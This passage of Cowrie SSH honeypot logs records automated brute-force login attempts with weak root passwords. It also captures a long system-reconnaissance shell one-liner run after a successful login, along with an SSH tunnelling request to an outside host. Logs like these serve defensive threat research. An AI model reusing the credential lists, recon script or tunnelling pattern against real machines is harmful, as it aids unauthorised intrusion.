-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.454714Z","src_ip":"212.227.235.229","session":"ced204051fb9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:36.155102Z","src_ip":"212.227.235.229","session":"4a0adb1ea65d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:50:36.196676Z","src_ip":"212.227.235.229","session":"ced204051fb9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:36.327035Z","src_ip":"212.227.235.229","session":"786f406f797d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:37.378556Z","src_ip":"212.227.235.229","session":"ced204051fb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38546,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7217680082f","protocol":"ssh","message":"New connection: 212.227.235.229:38546 (1.2.3.4:22) [session: f7217680082f]","sensor":"my-vps","timestamp":"2025-09-08T12:50:37.544866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:37.546298Z","src_ip":"212.227.235.229","session":"f7217680082f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:37.713255Z","src_ip":"212.227.235.229","session":"f7217680082f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:50:38.424213Z","src_ip":"212.227.235.229","session":"f7217680082f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:38.585246Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:38.593027Z","src_ip":"212.227.235.229","session":"f7217680082f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51146,"dst_ip":"1.2.3.4","dst_port":22,"session":"e370271e533b","protocol":"ssh","message":"New connection: 134.199.174.250:51146 (1.2.3.4:22) [session: e370271e533b]","sensor":"my-vps","timestamp":"2025-09-08T12:50:46.550897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:50:46.551655Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:50:46.872985Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:50:47.821038Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:50:48.529062Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.529872Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.530639Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.532310Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.533960Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.534710Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.535527Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.536498Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.537076Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.537861Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.538608Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.539726Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.540615Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.833694Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.834655Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:48.835569Z","src_ip":"134.199.174.250","session":"e370271e533b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25627,"dst_ip":"1.2.3.4","dst_port":22,"session":"2687cf93cc45","protocol":"ssh","message":"New connection: 212.227.125.160:25627 (1.2.3.4:22) [session: 2687cf93cc45]","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.294175Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.295309Z","src_ip":"212.227.125.160","session":"2687cf93cc45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25909,"dst_ip":"1.2.3.4","dst_port":22,"session":"397a94050256","protocol":"ssh","message":"New connection: 212.227.125.160:25909 (1.2.3.4:22) [session: 397a94050256]","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.402865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.403507Z","src_ip":"212.227.125.160","session":"397a94050256"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.514592Z","src_ip":"212.227.125.160","session":"397a94050256"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.848889Z","src_ip":"212.227.125.160","session":"397a94050256"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T12:50:51.960958Z","session":"397a94050256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41998,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e035866be4","protocol":"ssh","message":"New connection: 212.227.235.229:41998 (1.2.3.4:22) [session: 35e035866be4]","sensor":"my-vps","timestamp":"2025-09-08T12:51:13.708246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:51:13.709173Z","src_ip":"212.227.235.229","session":"35e035866be4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:51:13.971555Z","src_ip":"212.227.235.229","session":"35e035866be4"}
{"eventid":"cowrie.login.failed","username":"dev","password":"1","message":"login attempt [dev/1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:51:15.062510Z","src_ip":"212.227.235.229","session":"35e035866be4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:16.326617Z","src_ip":"212.227.235.229","session":"35e035866be4"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34446,"dst_ip":"1.2.3.4","dst_port":22,"session":"e59a96782c1f","protocol":"ssh","message":"New connection: 134.199.174.250:34446 (1.2.3.4:22) [session: e59a96782c1f]","sensor":"my-vps","timestamp":"2025-09-08T12:51:23.682809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:51:23.688720Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:51:24.009137Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:51:25.390799Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:51:26.113996Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo 